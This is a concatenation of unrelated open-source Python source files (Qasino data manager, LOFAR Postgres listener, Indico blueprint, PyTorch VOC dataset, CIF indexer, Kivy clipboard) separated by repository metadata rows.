'email': ('django.db.models.fields.TextField', [], {'unique': 'True', 'null': 'True', 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['survey'] | agpl-3.0 | -6,821,724,920,916,634,000 | 44.272727 | 119 | 0.5555 | false |
MediaMath/qasino | lib/data_manager.py | 1 | 15026 | # Copyright (C) 2014 MediaMath, Inc. <http://www.mediamath.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sqlite_backend as sql_backend
import table_merger
import util
import qasino_table
import logging
import time
import re
import yaml
import sys
import thread
from twisted.internet import threads
from twisted.internet import task
from twisted.internet import reactor
class DataManager(object):
def __init__(self, use_dbfile, db_dir=None, signal_channel=None, archive_db_dir=None,
generation_duration_s=30):
self.saved_tables = {}
self.query_id = 0
self.views = {}
self.thread_id = thread.get_ident()
self.stats = {}
self.generation_duration_s = generation_duration_s
self.signal_channel = signal_channel
self.archive_db_dir = archive_db_dir
self.static_db_filepath = db_dir + '/qasino_table_store_static.db'
# Start with zero because we'll call rotate_dbs instantly below.
self.db_generation_number = 0
# use_dbfile can be:
# 'memory- -> use in memory db
# /%d/ -> use the provided template filename
# ! /%d/ -> use the filename (same db every generation)
self.one_db = False
self.db_name = use_dbfile
if use_dbfile == None:
self.db_name = "qasino_table_store_%d.db"
elif use_dbfile == "memory":
self.db_name = ":memory:"
self.one_db = True
elif use_dbfile.find('%d') == -1:
self.one_db = True
# Initialize some things
self.table_merger = table_merger.TableMerger(self)
# Add db_dir path
if db_dir != None and self.db_name != ":memory:":
self.db_name = db_dir + '/' + self.db_name
# Open the writer backend db.
db_file_name = self.db_name
if not self.one_db:
db_file_name = self.db_name % self.db_generation_number
self.sql_backend_reader = None
self.sql_backend_writer = sql_backend.SqlConnections(db_file_name,
self,
self.archive_db_dir,
self.thread_id,
self.static_db_filepath)
self.sql_backend_writer_static = sql_backend.SqlConnections(self.static_db_filepath,
self,
self.archive_db_dir,
self.thread_id,
None)
# Make the data manager db rotation run at fixed intervals.
# This will also immediately make the call which will make the
# writer we just opened the reader and to open a new writer.
self.rotate_task = task.LoopingCall(self.async_rotate_dbs)
self.rotate_task.start(self.generation_duration_s)
def read_views(self, filename):
# Reset views
self.views = {}
try:
fh = open(filename, "r")
except Exception as e:
logging.info("Failed to open views file '%s': %s", filename, e)
return
try:
view_conf_obj = yaml.load(fh)
except Exception as e:
logging.info("Failed to parse view conf yaml file '%s': %s", filename, e)
return
for view in view_conf_obj:
try:
viewname = view["viewname"]
view = view["view"]
self.views[viewname] = { 'view' : view, 'loaded' : False, 'error' : '' }
except Exception as e:
logging.info("Failure getting view '%s': %s", view["viewname"] if "viewname" in view else 'unknown', e)
def get_query_id(self):
self.query_id += 1
return self.query_id
def shutdown(self):
self.rotate_task = None
self.sql_backend_reader = None
self.sql_backend_writer = None
def async_validate_and_route_query(self, sql, query_id, use_write_db=False):
if use_write_db:
return self.sql_backend_writer.run_interaction(sql_backend.SqlConnections.WRITER_INTERACTION,
self.validate_and_route_query, sql, query_id, self.sql_backend_writer)
else:
return self.sql_backend_reader.run_interaction(sql_backend.SqlConnections.READER_INTERACTION,
self.validate_and_route_query, sql, query_id, self.sql_backend_reader)
def validate_and_route_query(self, txn, sql, query_id, sql_backend):
# So when dbs rotate we'll force a shutdown of the backend
# after a certain amount of time to avoid hung or long running
# things in this code path from holding dbs open. This
# may/will invalidate references we might have in here so wrap
# it all in a try catch...
try:
m = re.search(r"^\s*select\s+", sql, flags=re.IGNORECASE)
if m == None:
# Process a non-select statement.
return self.process_non_select(txn, sql, query_id, sql_backend)
# Process a select statement.
return sql_backend.do_select(txn, sql)
except Exception as e:
msg = "Exception in validate_and_route_query: {}".format(str(e))
logging.info(msg)
return { "retval" : 0, "error_message" : msg }
def process_non_select(self, txn, sql, query_id, sql_backend):
"""
Called for non-select statements like show tables and desc.
"""
# DESC?
m = re.search(r"^\s*desc\s+(\S+)\s*;$", sql, flags=re.IGNORECASE)
if m != None:
(retval, error_message, table) = sql_backend.do_desc(txn, m.group(1))
result = { "retval" : retval }
if error_message:
result["error_message"] = error_message
if table:
result["data"] = table
return result
# DESC VIEW?
m = re.search(r"^\s*desc\s+view\s+(\S+)\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return sql_backend.do_select(txn, "SELECT view FROM qasino_server_views WHERE viewname = '%s';" % m.group(1))
# SHOW tables?
m = re.search(r"^\s*show\s+tables\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return sql_backend.do_select(txn, "SELECT *, strftime('%Y-%m-%d %H:%M:%f UTC', last_update_epoch, 'unixepoch') last_update_datetime FROM qasino_server_tables ORDER BY tablename;")
# SHOW tables with LIKE?
m = re.search(r"^\s*show\s+tables\s+like\s+('\S+')\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return sql_backend.do_select(txn, "SELECT *, strftime('%Y-%m-%d %H:%M:%f UTC', last_update_epoch, 'unixepoch') last_update_datetime FROM qasino_server_tables WHERE tablename LIKE {} ORDER BY tablename;".format(m.group(1)) )
# SHOW connections?
m = re.search(r"^\s*show\s+connections\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return sql_backend.do_select(txn, "SELECT *, strftime('%Y-%m-%d %H:%M:%f UTC', last_update_epoch, 'unixepoch') last_update_datetime FROM qasino_server_connections ORDER BY identity;")
# SHOW info?
m = re.search(r"^\s*show\s+info\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return sql_backend.do_select(txn, "SELECT *, strftime('%Y-%m-%d %H:%M:%f UTC', generation_start_epoch, 'unixepoch') generation_start_datetime FROM qasino_server_info;")
# SHOW views?
m = re.search(r"^\s*show\s+views\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return sql_backend.do_select(txn, "SELECT viewname, loaded, errormsg FROM qasino_server_views ORDER BY viewname;")
# Exit?
m = re.search(r"^\s*(quit|logout|exit)\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return { "retval" : 0, "error_message" : "Bye!" }
return { "retval" : 1, "error_message" : "ERROR: Unrecognized statement: %s" % sql }
def get_table_list(self):
return self.sql_backend_reader.tables
def insert_tables_table(self, txn, sql_backend_writer, sql_backend_writer_static):
table = qasino_table.QasinoTable("qasino_server_tables")
table.add_column("tablename", "varchar")
table.add_column("nr_rows", "int")
table.add_column("nr_updates", "int")
table.add_column("last_update_epoch", "int")
table.add_column("static", "int")
sql_backend_writer.add_tables_table_rows(table)
sql_backend_writer_static.add_tables_table_rows(table)
# the chicken or the egg - how do we add ourselves?
table.add_row( [ "qasino_server_tables",
table.get_nr_rows() + 1,
1,
time.time(),
0 ] )
return sql_backend_writer.add_table_data(txn, table, util.Identity.get_identity())
# This hack insures all the internal tables are inserted
# using the same sql_backend_writer and makes sure that the
# "tables" table is called last (after all the other internal
# tables are added).
def insert_internal_tables(self, txn, sql_backend_writer, sql_backend_reader, db_generation_number, time, generation_duration_s, views):
sql_backend_writer.insert_info_table(txn, db_generation_number, time, generation_duration_s)
sql_backend_writer.insert_connections_table(txn)
if sql_backend_reader != None:
sql_backend_writer.insert_sql_stats_table(txn, sql_backend_reader)
sql_backend_writer.insert_update_stats_table(txn)
# this should be second last so views can be created of any tables above.
# this means though that you can not create views of any tables below.
sql_backend_writer.add_views(txn, views)
sql_backend_writer.insert_views_table(txn, views)
# this should be last to include all the above tables
self.insert_tables_table(txn, sql_backend_writer, self.sql_backend_writer_static)
def async_rotate_dbs(self):
"""
Kick off the rotate in a sqlconnection context because we have
some internal tables and views to add before we rotate dbs.
"""
self.sql_backend_writer.run_interaction(sql_backend.SqlConnections.WRITER_INTERACTION, self.rotate_dbs)
def rotate_dbs(self, txn):
"""
Make the db being written to be the reader db.
Open a new writer db for all new updates.
"""
logging.info("**** DataManager: Starting generation %d", self.db_generation_number)
# Before making the write db the read db,
# add various internal info tables and views.
self.insert_internal_tables(txn,
self.sql_backend_writer,
self.sql_backend_reader,
self.db_generation_number,
time.time(),
self.generation_duration_s,
self.views)
# Increment the generation number.
self.db_generation_number = int(time.time())
# Set the writer to a new db
save_sql_backend_writer = self.sql_backend_writer
# If specified put the generation number in the db name.
db_file_name = self.db_name
if not self.one_db:
db_file_name = self.db_name % self.db_generation_number
self.sql_backend_writer = sql_backend.SqlConnections(db_file_name,
self,
self.archive_db_dir,
self.thread_id,
self.static_db_filepath)
# Set the reader to what was the writer
# Note the reader will (should) be deconstructed here.
# Just in case something else is holding a ref to the reader
# (indefinitely!?) force a shutdown of this backend after a
# certain amount of time though.
if self.sql_backend_reader:
reactor.callLater(self.generation_duration_s * 3,
sql_backend.SqlConnections.shutdown,
self.sql_backend_reader.writer_dbpool,
self.sql_backend_reader.filename,
None)
reactor.callLater(self.generation_duration_s * 3,
sql_backend.SqlConnections.shutdown,
self.sql_backend_reader.reader_dbpool,
self.sql_backend_reader.filename,
self.sql_backend_reader.archive_db_dir)
self.sql_backend_reader = save_sql_backend_writer
# Load saved tables.
self.async_add_saved_tables()
# Lastly blast out the generation number.
if self.signal_channel != None:
self.signal_channel.send_generation_signal(self.db_generation_number, self.generation_duration_s)
def check_save_table(self, table, identity):
tablename = table.get_tablename()
key = tablename + identity
if table.get_property('persist'):
self.saved_tables[key] = { "table" : table, "tablename" : tablename, "identity" : identity }
else:
# Be sure to remove a table that is no longer persisting.
if key in self.saved_tables:
del self.saved_tables[key]
def async_add_saved_tables(self):
for key, table_data in self.saved_tables.iteritems():
logging.info("DataManager: Adding saved table '%s' from '%s'", table_data["tablename"], table_data["identity"])
self.sql_backend_writer.async_add_table_data(table_data["table"], table_data["identity"])
| apache-2.0 | 5,960,669,923,601,375,000 | 36.753769 | 235 | 0.55943 | false |
jjdmol/LOFAR | LCS/PyCommon/postgres.py | 1 | 11659 | #!/usr/bin/python
# Copyright (C) 2012-2015 ASTRON (Netherlands Institute for Radio Astronomy)
# P.O. Box 2, 7990 AA Dwingeloo, The Netherlands
#
# This file is part of the LOFAR software suite.
# The LOFAR software suite is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The LOFAR software suite is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with the LOFAR software suite. If not, see <http://www.gnu.org/licenses/>.
# $Id$
'''
Module with nice postgres helper methods and classes.
'''
import logging
from threading import Thread, Lock
from Queue import Queue, Empty
import select
import psycopg2
import psycopg2.extras
import psycopg2.extensions
logger = logging.getLogger(__name__)
def makePostgresNotificationQueries(schema, table, action, view_for_row=None, view_selection_id=None):
action = action.upper()
if action not in ('INSERT', 'UPDATE', 'DELETE'):
raise ValueError('''trigger_type '%s' not in ('INSERT', 'UPDATE', 'DELETE')''' % action)
if view_for_row and action == 'DELETE':
raise ValueError('You cannot use a view for results on action DELETE')
if view_for_row:
change_name = '''{table}_{action}_with_{view_for_row}'''.format(schema=schema,
table=table,
action=action,
view_for_row=view_for_row)
function_name = '''NOTIFY_{change_name}'''.format(change_name=change_name)
function_sql = '''
CREATE OR REPLACE FUNCTION {schema}.{function_name}()
RETURNS TRIGGER AS $$
DECLARE
new_row_from_view {schema}.{view_for_row}%ROWTYPE;
BEGIN
select * into new_row_from_view from {schema}.{view_for_row} where {view_selection_id} = NEW.id LIMIT 1;
PERFORM pg_notify(CAST('{change_name}' AS text),
'{{"old":' || {old} || ',"new":' || row_to_json(new_row_from_view)::text || '}}');
RETURN NEW;
END;
$$ LANGUAGE plpgsql;
'''.format(schema=schema,
function_name=function_name,
table=table,
action=action,
old='row_to_json(OLD)::text' if action == 'UPDATE' or action == 'DELETE' else '\'null\'',
view_for_row=view_for_row,
view_selection_id=view_selection_id if view_selection_id else 'id',
change_name=change_name.lower())
else:
change_name = '''{table}_{action}'''.format(table=table, action=action)
function_name = '''NOTIFY_{change_name}'''.format(change_name=change_name)
function_sql = '''
CREATE OR REPLACE FUNCTION {schema}.{function_name}()
RETURNS TRIGGER AS $$
BEGIN
PERFORM pg_notify(CAST('{change_name}' AS text),
'{{"old":' || {old} || ',"new":' || {new} || '}}');
RETURN {value};
END;
$$ LANGUAGE plpgsql;
'''.format(schema=schema,
function_name=function_name,
table=table,
action=action,
old='row_to_json(OLD)::text' if action == 'UPDATE' or action == 'DELETE' else '\'null\'',
new='row_to_json(NEW)::text' if action == 'UPDATE' or action == 'INSERT' else '\'null\'',
value='OLD' if action == 'DELETE' else 'NEW',
change_name=change_name.lower())
trigger_name = 'TRIGGER_NOTIFY_%s' % function_name
trigger_sql = '''
CREATE TRIGGER {trigger_name}
AFTER {action} ON {schema}.{table}
FOR EACH ROW
EXECUTE PROCEDURE {schema}.{function_name}();
'''.format(trigger_name=trigger_name,
function_name=function_name,
schema=schema,
table=table,
action=action)
drop_sql = '''
DROP TRIGGER IF EXISTS {trigger_name} ON {schema}.{table} CASCADE;
DROP FUNCTION IF EXISTS {schema}.{function_name}();
'''.format(trigger_name=trigger_name,
function_name=function_name,
schema=schema,
table=table)
sql = drop_sql + '\n' + function_sql + '\n' + trigger_sql
sql_lines = '\n'.join([s.strip() for s in sql.split('\n')]) + '\n'
return sql_lines
class PostgresListener(object):
''' This class lets you listen to postgress notifications
It execute callbacks when a notifocation occurs.
Make your own subclass with your callbacks and subscribe them to the appriate channel.
Example:
class MyListener(PostgresListener):
def __init__(self, host, database, username, password):
super(MyListener, self).__init__(host=host, database=database, username=username, password=password)
self.subscribe('foo', self.foo)
self.subscribe('bar', self.bar)
def foo(self, payload = None):
print "Foo called with payload: ", payload
def bar(self, payload = None):
print "Bar called with payload: ", payload
with MyListener(...args...) as listener:
#either listen like below in a loop doing stuff...
while True:
#do stuff or wait,
#the listener calls the callbacks meanwhile in another thread
#... or listen like below blocking
#while the listener calls the callbacks meanwhile in this thread
listener.waitWhileListening()
'''
def __init__(self,
host='',
database='',
username='',
password=''):
'''Create a new PostgresListener'''
self.conn = psycopg2.connect(host=host,
user=username,
password=password,
database=database)
self.conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
self.cursor = self.conn.cursor()
self.__listening = False
self.__lock = Lock()
self.__callbacks = {}
self.__waiting = False
self.__queue = Queue()
def subscribe(self, notification, callback):
'''Subscribe to a certain postgres notification.
Call callback method in case such a notification is received.'''
logger.info("Subscribed %sto %s" % ('and listening ' if self.isListening() else '', notification))
with self.__lock:
self.cursor.execute("LISTEN %s;", (psycopg2.extensions.AsIs(notification),))
self.__callbacks[notification] = callback
def unsubscribe(self, notification):
'''Unubscribe from a certain postgres notification.'''
logger.info("Unsubscribed from %s" % notification)
with self.__lock:
self.cursor.execute("UNLISTEN %s;", (psycopg2.extensions.AsIs(notification),))
if notification in self.__callbacks:
del self.__callbacks[notification]
def isListening(self):
'''Are we listening? Has the listener been started?'''
with self.__lock:
return self.__listening
def start(self):
'''Start listening. Does nothing if already listening.
When using the listener in a context start() and stop()
are called upon __enter__ and __exit__
This method return immediately.
Listening and calling callbacks takes place on another thread.
If you want to block processing and call the callbacks on the main thread,
then call waitWhileListening() after start.
'''
if self.isListening():
return
logger.info("Started listening to %s" % ', '.join([str(x) for x in self.__callbacks.keys()]))
def eventLoop():
while self.isListening():
if select.select([self.conn],[],[],2) != ([],[],[]):
self.conn.poll()
while self.conn.notifies:
try:
notification = self.conn.notifies.pop(0)
logger.debug("Received notification on channel %s payload %s" % (notification.channel, notification.payload))
if self.isWaiting():
# put notification on Queue
# let waiting thread handle the callback
self.__queue.put((notification.channel, notification.payload))
else:
# call callback on this listener thread
self._callCallback(notification.channel, notification.payload)
except Exception as e:
logger.error(str(e))
self.__thread = Thread(target=eventLoop)
self.__thread.daemon = True
self.__listening = True
self.__thread.start()
def stop(self):
'''Stop listening. (Can be restarted)'''
with self.__lock:
if not self.__listening:
return
self.__listening = False
self.__thread.join()
self.__thread = None
logger.info("Stopped listening")
self.stopWaiting()
def __enter__(self):
'''starts the listener upon contect enter'''
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
'''stops the listener upon contect enter'''
self.stop()
def _callCallback(self, channel, payload = None):
'''call the appropiate callback based on channel'''
try:
callback = None
with self.__lock:
if channel in self.__callbacks:
callback = self.__callbacks[channel]
if callback:
if payload:
callback(payload)
else:
callback()
except Exception as e:
logger.error(str(e))
def isWaiting(self):
'''Are we waiting in the waitWhileListening() method?'''
with self.__lock:
return self.__waiting
def stopWaiting(self):
'''break from the blocking waitWhileListening() method'''
with self.__lock:
if self.__waiting:
self.__waiting = False
logger.info("Continuing from blocking waitWhileListening")
def waitWhileListening(self):
'''
block calling thread until interrupted or
until stopWaiting is called from another thread
meanwhile, handle the callbacks on this thread
'''
logger.info("Waiting while listening to %s" % ', '.join([str(x) for x in self.__callbacks.keys()]))
with self.__lock:
self.__waiting = True
while self.isWaiting():
try:
notification = self.__queue.get(True, 1)
channel = notification[0]
payload = notification[1]
self._callCallback(channel, payload)
except KeyboardInterrupt:
# break
break
except Empty:
pass
self.stopWaiting()
| gpl-3.0 | 248,377,241,846,325,470 | 38.388514 | 137 | 0.560854 | false |
DavidAndreev/indico | indico/modules/announcement/blueprint.py | 1 | 1100 | # This file is part of Indico.
# Copyright (C) 2002 - 2016 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from indico.modules.announcement.controllers import RHAnnouncement
from indico.web.flask.wrappers import IndicoBlueprint
_bp = IndicoBlueprint('announcement', __name__, template_folder='templates', virtual_template_folder='announcement')
_bp.add_url_rule('/admin/announcement', 'manage', RHAnnouncement, methods=('GET', 'POST'))
| gpl-3.0 | 3,865,233,160,629,510,700 | 44.833333 | 116 | 0.766364 | false |
MegaShow/college-programming | Homework/Principles of Artificial Neural Networks/Week 8 Object Detection/datasets.py | 1 | 2942 | import torch
from torch.utils.data import Dataset
import json
import os
from PIL import Image
from utils import transform
class PascalVOCDataset(Dataset):
"""
A PyTorch Dataset class to be used in a PyTorch DataLoader to create batches.
"""
def __init__(self, data_folder, split, keep_difficult=False):
"""
:param data_folder: folder where data files are stored
:param split: split, one of 'TRAIN' or 'TEST'
:param keep_difficult: keep or discard objects that are considered difficult to detect?
"""
self.split = split.upper()
assert self.split in {'TRAIN', 'TEST'}
self.data_folder = data_folder
self.keep_difficult = keep_difficult
# Read data files
with open(os.path.join(data_folder, self.split + '_images.json'), 'r') as j:
self.images = json.load(j)
with open(os.path.join(data_folder, self.split + '_objects.json'), 'r') as j:
self.objects = json.load(j)
assert len(self.images) == len(self.objects)
def __getitem__(self, i):
# Read image
image = Image.open(self.images[i], mode='r')
image = image.convert('RGB')
# Read objects in this image (bounding boxes, labels, difficulties)
objects = self.objects[i]
boxes = torch.FloatTensor(objects['boxes']) # (n_objects, 4)
labels = torch.LongTensor(objects['labels']) # (n_objects)
difficulties = torch.ByteTensor(objects['difficulties']) # (n_objects)
# Discard difficult objects, if desired
if not self.keep_difficult:
boxes = boxes[1 - difficulties]
labels = labels[1 - difficulties]
difficulties = difficulties[1 - difficulties]
# Apply transformations
image, boxes, labels, difficulties = transform(image, boxes, labels, difficulties, split=self.split)
return image, boxes, labels, difficulties
def __len__(self):
return len(self.images)
def collate_fn(self, batch):
"""
Since each image may have a different number of objects, we need a collate function (to be passed to the DataLoader).
This describes how to combine these tensors of different sizes. We use lists.
Note: this need not be defined in this Class, can be standalone.
:param batch: an iterable of N sets from __getitem__()
:return: a tensor of images, lists of varying-size tensors of bounding boxes, labels, and difficulties
"""
images = list()
boxes = list()
labels = list()
difficulties = list()
for b in batch:
images.append(b[0])
boxes.append(b[1])
labels.append(b[2])
difficulties.append(b[3])
images = torch.stack(images, dim=0)
return images, boxes, labels, difficulties # tensor (N, 3, 300, 300), 3 lists of N tensors each
| mit | -8,096,475,863,341,076,000 | 33.611765 | 125 | 0.616927 | false |
jeffmurphy/cif-db | src/DB/Exploder/Indexer.py | 1 | 10137 | import syslog
from datetime import datetime
import time
import re
import sys
import threading
import happybase
import struct
import hashlib
import base64
sys.path.append('/usr/local/lib/cif-protocol/pb-python/gen-py')
import msg_pb2
import feed_pb2
import control_pb2
import RFC5070_IODEF_v1_pb2
import MAEC_v2_pb2
import cifsupport
from DB.Salt import Salt
from DB.PrimaryIndex import PrimaryIndex
from DB.Log import Log
class Indexer(object):
"""
"""
def __init__ (self, connectionPool, index_type, num_servers = 1, table_batch_size = 1000, debug = 0):
self.debug = debug
print "indexer connect"
self.pool = connectionPool
print "indexer load primary index map"
self.primary_index = PrimaryIndex(connectionPool, debug)
print "index init log"
self.log = Log(connectionPool)
self.num_servers = num_servers
self.packers = {}
for packer in self.primary_index.names():
try:
package='DB.PrimaryIndex.PackUnpack'
self.L("loading packer " + package + "." + packer)
__import__(package + "." + packer)
pkg = sys.modules[package + "." + packer]
self.packers[packer] = getattr(pkg, packer)
except ImportError as e:
self.L("warning: failed to load " + packer)
with self.pool.connection() as dbh:
t = dbh.tables()
self.table_name = "index_" + index_type
if not self.table_name in t:
self.L("index table %s doesnt exist, creating it" % (self.table_name))
dbh.create_table(self.table_name, {'b': {'COMPRESSION': 'SNAPPY'}})
table_batch_size = 5
self.table = dbh.table(self.table_name).batch(batch_size=table_batch_size)
self.co_table = dbh.table("cif_objs").batch(batch_size=table_batch_size)
self.reset()
self.md5 = hashlib.md5()
self.salt = Salt(self.num_servers, self.debug)
def L(self, msg):
caller = ".".join([str(__name__), sys._getframe(1).f_code.co_name])
if self.debug != None:
print caller + ": " + msg
else:
self.log.L(caller + ": " + msg)
def pack_rowkey_ipv4(self, salt, addr):
return struct.pack(">HB", self.salt.next(), self.TYPE_IPV4()) + self.packers['ipv4'].pack(addr)
def pack_rowkey_ipv6(self, salt, addr):
return struct.pack(">HB", self.salt.next(), self.TYPE_IPV6()) + self.packers['ipv6'].pack(addr)
def pack_rowkey_fqdn(self, salt, fqdn):
return struct.pack(">HB", self.salt.next(), self.TYPE_FQDN()) + self.packers['domain'].pack(fqdn)
def pack_rowkey_url(self, salt, url):
return struct.pack(">HB", self.salt.next(), self.TYPE_URL()) + self.packers['url'].pack(url)
def pack_rowkey_email(self, salt, email):
return struct.pack(">HB", self.salt.next(), self.TYPE_URL()) + self.packers['email'].pack(email)
def pack_rowkey_search(self, salt, search):
return struct.pack(">HB", self.salt.next(), self.TYPE_SEARCH()) + self.packers['search'].pack(search)
def pack_rowkey_malware(self, salt, malware_hash):
return struct.pack(">HB", self.salt.next(), self.TYPE_MALWARE()) + self.packers['malware'].pack(malware_hash)
def pack_rowkey_asn(self, salt, asn):
return struct.pack(">HB", self.salt.next(), self.TYPE_ASN()) + self.packers['asn'].pack(asn)
def reset(self):
self.empty = True
self.addr = None
self.rowkey = None
self.confidence = None
self.addr_type = None
self.iodef_rowkey = None
def commit(self):
"""
Commit the record to the index_* table
Update cif_objs(rowkey=self.iodef_rowkey) so that 'b:{self.table_name}_{self.rowkey}' = 1
Purger will remove the reference when this feed record is purged.
With hbase, you can put an addt'l cell value into a table/row without having to
merge. Existing cells won't be affected.
"""
try:
rowdict = {
'b:confidence': str(self.confidence),
'b:addr_type': str(self.addr_type),
'b:iodef_rowkey': str(self.iodef_rowkey)
}
self.table.put(self.rowkey, rowdict)
fmt = "%ds" % (len(self.table_name) + 4)
prk = struct.pack(fmt, "cf:" + str(self.table_name) + "_") + self.rowkey
self.co_table.put(self.iodef_rowkey, { prk: "1" })
except Exception as e:
self.L("failed to put record to %s table: " % self.table_name)
print e
self.reset()
def extract(self, iodef_rowkey, iodef):
"""
FIX atm this is iodef specific. ideally we will be able to index other document types
"""
self.reset()
self.iodef_rowkey = iodef_rowkey
self.md5.update(iodef.SerializeToString())
self.hash = self.md5.digest()
ii = iodef.Incident[0]
#print ii
self.confidence = ii.Assessment[0].Confidence.content
self.severity = ii.Assessment[0].Impact[0].severity
# for malware hashes, they appear at the top level for now
# iodef.incident[].additionaldata.meaning = "malware hash"
# iodef.incident[].additionaldata.content = "[the hash]"
if hasattr(ii, 'AdditionalData'):
for ed in ii.AdditionalData:
#print "ED ", ed
if ed.meaning == "malware hash":
self.L("\tIndexing for malware hash")
self.rowkey = self.pack_rowkey_malware(self.salt.next(), ed.content)
self.commit()
# addresses and networks are in the EventData[].Flow[].System[] tree
if len(ii.EventData) > 0 or hasattr(ii, 'EventData'):
for ed in ii.EventData:
for fl in ed.Flow:
for sy in fl.System:
for i in sy.Node.Address:
self.addr_type = i.category
if self.addr_type == RFC5070_IODEF_v1_pb2.AddressType.Address_category_ipv4_addr or self.addr_type == RFC5070_IODEF_v1_pb2.AddressType.Address_category_ipv4_net:
self.addr = i.content
self.rowkey = self.pack_rowkey_ipv4(self.salt.next(), self.addr)
self.L("Indexing for ipv4")
self.commit()
# ipv6 addresses and networks
elif self.addr_type == RFC5070_IODEF_v1_pb2.AddressType.Address_category_ipv6_addr or self.addr_type == RFC5070_IODEF_v1_pb2.AddressType.Address_category_ipv6_net:
self.addr = i.content
self.rowkey = self.pack_rowkey_ipv6(self.salt.next(), self.addr)
self.L("Indexing for ipv6")
self.commit()
elif self.addr_type == RFC5070_IODEF_v1_pb2.AddressType.Address_category_asn:
self.addr = i.content
self.rowkey = self.pack_rowkey_ipv6(self.salt.next(), self.addr)
self.L("Indexing for ASN")
self.commit()
elif self.addr_type == RFC5070_IODEF_v1_pb2.AddressType.Address_category_ext_value:
if i.ext_category == "fqdn":
self.fqdn = i.content
self.rowkey = self.pack_rowkey_fqdn(self.salt.next(), self.fqdn)
self.L("Indexing for FQDDN")
self.commit()
elif i.ext_category == "url":
self.rowkey = self.pack_rowkey_url(self.salt.next(), i.content)
self.L("Indexing for URL")
self.commit()
else:
e = self.primary_index.enum(i.ext_category)
if len(e) > 0:
self.rowkey = struct.pack(">HB", self.salt.next(), e[0]) + self.packers[i.ext_category].pack(i.content)
self.commit()
else:
self.L("Unknown primary index given " + i.ext_category)
else:
print "unhandled category: ", i
def TYPE_IPV4(self):
return self.primary_index.enum('ipv4')
def TYPE_IPV6(self):
return self.primary_index.enum('ipv6')
def TYPE_FQDN(self):
return self.primary_index.enum('domain')
def TYPE_URL(self):
return self.primary_index.enum('url')
def TYPE_EMAIL(self):
return self.primary_index.enum('email')
def TYPE_SEARCH(self):
return self.primary_index.enum('search')
def TYPE_MALWARE(self):
return self.primary_index.enum('malware')
def TYPE_ASN(self):
return self.primary_index.enum('asn')
| bsd-3-clause | -6,272,114,305,446,935,000 | 39.710843 | 191 | 0.494722 | false |
Zen-CODE/kivy | kivy/core/clipboard/__init__.py | 1 | 3959 | '''
Clipboard
=========
Core class for accessing the Clipboard. If we are not able to access the
system clipboard, a fake one will be used.
Usage example::
>>> from kivy.core.clipboard import Clipboard
>>> Clipboard.get_types()
['TIMESTAMP', 'TARGETS', 'MULTIPLE', 'SAVE_TARGETS', 'UTF8_STRING',
'COMPOUND_TEXT', 'TEXT', 'STRING', 'text/plain;charset=utf-8',
'text/plain']
>>> Clipboard.get('TEXT')
'Hello World'
>>> Clipboard.put('Great', 'UTF8_STRING')
>>> Clipboard.get_types()
['UTF8_STRING']
>>> Clipboard.get('UTF8_STRING')
'Great'
.. note:: The main implementation relies on Pygame and works well with
text/strings. Anything else might not work the same on all platforms.
'''
__all__ = ('ClipboardBase', 'Clipboard')
from kivy.core import core_select_lib
from kivy.utils import platform
class ClipboardBase(object):
def get(self, mimetype):
'''Get the current data in clipboard, using the mimetype if possible.
You not use this method directly. Use :meth:`paste` instead.
'''
return None
def put(self, data, mimetype):
'''Put data on the clipboard, and attach a mimetype.
You should not use this method directly. Use :meth:`copy` instead.
'''
pass
def get_types(self):
'''Return a list of supported mimetypes
'''
return []
def _ensure_clipboard(self):
''' Ensure that the clipboard has been properly initialised.
'''
if hasattr(self, '_clip_mime_type'):
return
if platform == 'win':
self._clip_mime_type = 'text/plain;charset=utf-8'
# windows clipboard uses a utf-16 encoding
self._encoding = 'utf-16'
elif platform == 'linux':
self._clip_mime_type = 'UTF8_STRING'
self._encoding = 'utf-8'
else:
self._clip_mime_type = 'text/plain'
self._encoding = 'utf-8'
def copy(self, data=''):
''' Copy the value provided in argument `data` into current clipboard.
If data is not of type string it will be converted to string.
.. versionadded:: 1.9.0
'''
if data:
self._copy(data)
def paste(self):
''' Get text from the system clipboard and return it a usable string.
.. versionadded:: 1.9.0
'''
return self._paste()
def _copy(self, data):
# explicitly terminate strings with a null character
# so as to avoid putting spurious data after the end.
# MS windows issue.
self._ensure_clipboard()
data = data.encode(self._encoding) + b'\x00'
self.put(data, self._clip_mime_type)
def _paste(self):
self._ensure_clipboard()
_clip_types = Clipboard.get_types()
mime_type = self._clip_mime_type
if mime_type not in _clip_types:
mime_type = 'text/plain'
data = self.get(mime_type)
if data is not None:
# decode only if we don't have unicode
# we would still need to decode from utf-16 (windows)
# data is of type bytes in PY3
data = data.decode(self._encoding, 'ignore')
# remove null strings mostly a windows issue
data = data.replace(u'\x00', u'')
return data
